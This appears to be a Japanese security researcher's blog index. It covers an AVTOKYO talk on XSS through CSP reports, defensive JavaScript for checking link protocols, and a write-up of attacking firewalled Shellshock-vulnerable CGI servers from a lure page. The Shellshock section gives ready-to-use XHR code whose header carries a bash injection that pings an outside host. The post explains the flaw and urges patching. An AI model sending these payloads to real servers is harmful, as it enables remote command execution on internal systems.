脆弱性"&'\ Advent Calendar 2014 (15日目)
この記事は脆弱性"&'<<>\ Advent Calendar 2014の15日目の記事です。
Enjoy!
脆弱性"&'\ Advent Calendar 2014 (14日目)
この記事は脆弱性"&'<<>\ Advent Calendar 2014の14日目の記事です。
Enjoy!
脆弱性"&'\ Advent Calendar 2014 (13日目)
この記事は脆弱性"&'<<>\ Advent Calendar 2014の13日目の記事です。
Enjoy!
AVTOKYO 2014で「CSPが切り開くWebセキュリティの未来」という題で話してきた
AVTOKYO2014で、にしむねあさんといっしょに「はせむねあ」というユニット名でContent-Security-Policyをテーマに話をしてきました。
内容はスライドのとおりで、攻撃者はFiddlerなどを使って任意のCSP違反レポートJSONを送信可能であること、Firefoxの場合にはCSP違反レポートのJSON内に「<」「>」などが含まれるので、違反レポートを表示する管理画面でのエスケープ漏れがあると違反レポートを通じて管理画面内でXSSする、などの話を行い、実際に管理画面でのXSSのデモを行いました。デモはあんまり細かいことは考えてなかったんですが、アドリブ苦手なにしむねあさんがいい味を出してて、横で見ていても楽しかったです。ちなみに直前の打ち合わせは以下のような感じでした。
- にしむねあ「私、デモ直前にステージ上で衣装を替えようと思うんですが、はせがわさんどうします?」
- はせがわ「攻撃者の格好してからステージに出ようと思ってたけど、じゃあ同じくステージ上でデモ前に準備しましょうか。」
- にしむねあ「じゃあ前半のスライドを話すのどうします?間に合いませんよね?」
- はせがわ「にしむねあさんに話すのも含めてやらせているという構図そのものもネタにしたいので、自己紹介以降全部にしむねあさんにお願いしちゃってもいいですか?」
- にしむねあ「え?あ、はい…。」
ここからにしむねあさん超真面目な顔で台本を復習し始め本番へ。おかげでにしむねあさんは発表まで落ち着いて飲めなかったようですみませんでした!
ちなみに、あまりに細かすぎて伝わってなかった部分の補足:
JavaScriptでリンク先URLがhttp/httpsか確認する方法
JavaScriptで動的にリンクを生成する際に、DOM-based XSSを防ぐためにリンク先がhttpあるいはhttpsに限定されていることを確認したい場合がある。典型的には以下のようなコードとなる。
var div, elm; // 変数 url は攻撃者がコントロール可能な文字列 if( url.match( /^https?:\/\// ) ){ div = document.getElementById( "info" ); elm = document.createElement( "a" ); elm.setAttribute( "href", url ); elm.appendChild( document.createTextNode( url ) ); div.appendChild( elm ); }
この場合、変数urlに「http://example.jp」や「https://example.jp」などが与えられたときにはA要素が生成されリンク先としてそれらのURLが設定され、「javascript:alert(1)」「vbscript:MsgBox 1」などの場合にはリンクは生成されず、DOM-based XSSを防ぐことができる。
ただし、このコードではurlには「http://」あるいは「https://」で始まる文字列であることが強制されるために、「/foo」のような文字列を与えて <a href="/foo"> のような相対URLのリンクを設定することができない。
このような場合に、与えられた文字列をパースして先頭部分にプロトコルらしきプレフィックスが含まれていなければ…のような処理を自分で書くことはあまりいい方法ではないのでどうしたものかと思案していたところ、malaさんから「elm.href = "javascript:"; elm.protocol でとれない?」と教えてもらった。A要素にprotocolプロパティがあるのも知らなかったので試してみたところ、以下のようなコードでメジャーなブラウザではうまくいくことがわかった。いくつかのブラウザではURLがhttpの相対リンクであってもelm.protocolが「:」や空文字になったりすることもあり、またURLが不正な場合にもelm.protocolが「:」や空文字になったりすることがある。ただし、不正なURLではクリックしてもDOM-based XSSは発生しないので特に問題はないと思われる。
var div, elm; // 変数 url は攻撃者がコントロール可能な文字列 div = document.getElementById( "info" ); elm = document.createElement( "a" ); elm.setAttribute( "href", url ); if( elm.protocol.match( /^https?:$/ ) || elm.protocol === ":" || elm.protocol === "" ){ elm.appendChild( document.createTextNode( url ) ); div.appendChild( elm ); }
なお、A要素にはprotocolだけでなくhostやhostnameなどのプロパティもあるので、ChromeやFirefoxで new URL( url, location.href ); みたいに書いてたコードとほぼ同じことがIEでもできる。
相対パス解決したいときは大体これつかってますね、ブラウザの実装に頼る
DOMを信じろ! (by mala)
各ブラウザでの様々なURLを設定した場合のA要素のprotocolの値については http://utf-8.jp/test/a-elm-protocol.html にまとめておく。
2014-11-10追記: 関連: IE で a 要素を使って相対 URL からスキームを得る: Days on the Moon
ファイアウォール内のサーバに対するShellshockを利用した攻撃
条件としては、
- そのサーバにはシェルを経由して外部コマンドを起動するCGI等が動いている(通常のShellshockの攻撃と同条件)
- 攻撃者がそのURLを事前に知っている(あるいは推測可能)
となります。
攻撃者は、ユーザーを罠URLへ誘導し、以下のようなJavaScriptを罠ページ上で動かし、攻撃対象のWebアプリケーションへXHR経由でリクエストを発行します。
var xhr = new XMLHttpRequest(); xhr.open( "GET", "http://192.168.1.1/shellshock-vulnerable.cgi", true ); // ファイアウォール内のURL xhr.onload = function(){}; xhr.setRequestHeader( "Accept", "() { :;}; ping -c 3 my-site.example.jp" ); xhr.send( null );
XHRによるAcceptヘッダの変更では、クロスオリジンのリクエストでもpreflightリクエストが発行されないため、上記JavaScriptによってファイアウォール内のCGIに対して正常にリクエストが発行されます。CGIではAcceptに指定された文字列が環境変数 HTTP_ACCEPT に設定されるため、この文字列がコマンドとして実行されてしまいます。
ここまで、「ファイアウォール内のサーバ」と説明しましたが、ファイアウォール内に限らずBASIC認証で保護されているサーバであっても全く同様に、ログイン済みのユーザーを罠URLへ誘導することで攻撃が可能となります。
該当サーバ上のShellshock攻撃が適用するURLを知られているというだけで攻撃可能になりますので、企業内等のサーバであっても可能な限り速やかにパッチの適用をしましょう。
これより以下は2014-09-27に変更するより前の記述で、不正確な内容です。
会社のブログにも書いてますが、ファイアウォール内に置いてあるサーバで攻撃者が直接アクセスできないからといってbashの更新を怠っていると、条件によっては攻撃が可能となります。
条件としては、
- そのサーバにはシェルを経由して外部コマンドを起動するCGI等が動いている(通常のShellshockの攻撃と同条件)
- そのサーバにはXSSのあるWebアプリケーションが存在している変更:この条件は攻撃者には不要)
- 攻撃者は1.および2.の両方のURLを事前に知っている(あるいは推測可能)
となります。
攻撃者は、ユーザーを罠URLへ誘導し、2.のXSSが存在するページを利用して以下のようなJavaScriptを攻撃対象のWebアプリケーション上で動かします。
var xhr = new XMLHttpRequest(); xhr.open( "GET", "/shellshock-vulnerable.cgi", true ); xhr.onload = function(){}; xhr.setRequestHeader( "X-test", "() { :;}; ping -c 3 my-site.example.jp" ); xhr.send( null );
XMLHttpRequestによってカスタムヘッダを付与することでCGIへは新たな環境変数を容易に与えることができます。また、クロスオリジンでのXMLHttpRequestによるリクエストの発行ではカスタムヘッダがついている場合にはpreflightと呼ばれるリクエストが事前に発行されるために通常はCGIは起動しませんが、XSSによって同一オリジン内でのリクエストとなるためにそういった制約も発生しません。
これにより、対象サイト上ではCGIの動作に伴い環境変数内の文字列がコマンドとして実行されてしまいます。
ここまで、「ファイアウォール内のサーバ」と説明しましたが、ファイアウォール内に限らずBASIC認証で保護されているサーバであっても全く同様に、ログイン済みのユーザーを罠URLへ誘導してXSSを経由することで攻撃が可能となります。
該当サーバ上にXSSがあること・攻撃者がそれらのURLを知っていることという条件は現実的には簡単には存在し得ないかも知れませんが、とはいえ「ファイアウォール内なので大丈夫」という安心もしていられないということになります。企業内等のサーバであっても可能な限り速やかにパッチの適用をしましょう。
(XSSを使わななくても、クロスオリジンで簡単に環境変数を設定できるようなリクエストの投げ方を知ってる人いたら教えてください!)